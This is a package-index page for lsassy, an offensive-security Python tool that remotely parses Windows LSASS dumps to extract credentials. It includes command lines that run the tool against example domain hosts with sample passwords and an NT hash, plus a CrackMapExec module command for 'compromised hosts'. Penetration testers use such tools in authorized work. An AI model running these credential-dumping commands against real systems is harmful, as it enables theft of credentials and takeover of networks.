Skip to main content

Python library to parse remote lsass dumps

Project description


PyPI version

Python library to remotely parse lsass dump and extract credentials. This library uses impacket projects to remotely read necessary bytes in lsass dump and pypykatz to extract credentials.

CME Module example


Basic Usage

lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target>:/share_name/path/to/lsass.dmp

CrackMapExec module

I wrote a CrackMapExec module that uses lsassy to extract credentials on compromised hosts

CrackMapExec module is in cme folder : CME Module



lsassy ADSEC.LOCAL/jsnow:Winter_is_coming_\!@dc01.adsec.local:/C$/Windows/Temp/lsass.dmp

lsassy --hashes 952c28bd2fd728898411b301475009b7 Administrateur@desktop01.adsec.local:/ADMIN$/lsass.dmp

CME Module

crackmapexec smb -d adsec.local -u Administrator -p Passw0rd -M lsassy -o BLOODHOUND=True NEO4JPASS=bloodhound```


From pip

python3.7 -m pip install lsassy

From sources

python3.7 install


* Add BloodHound option to CME module (-o BLOODHOUND=True)
    - Set compromised targets as "owned" in BloodHound
    - Check if compromised users have at least one path to domain admin
* Custom parsing (json, grep, pretty [default])
* New --hashes option to lsassy

* Include CME module in repository
* Add credentials to CME database

First release


  • Impacket
  • SkelSec for Pypykatz, but also for his patience and help
  • mpgn for his help and ideas

Project details

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Files for lsassy, version 0.2.2
Filename, size File type Python version Upload date Hashes
Filename, size lsassy-0.2.2-py3-none-any.whl (8.6 kB) File type Wheel Python version py3 Upload date Hashes View hashes
Filename, size lsassy-0.2.2.tar.gz (6.1 kB) File type Source Python version None Upload date Hashes View hashes

Supported by

Elastic Elastic Search Pingdom Pingdom Monitoring Google Google BigQuery Sentry Sentry Error logging AWS AWS Cloud computing DataDog DataDog Monitoring Fastly Fastly CDN SignalFx SignalFx Supporter DigiCert DigiCert EV certificate StatusPage StatusPage Status page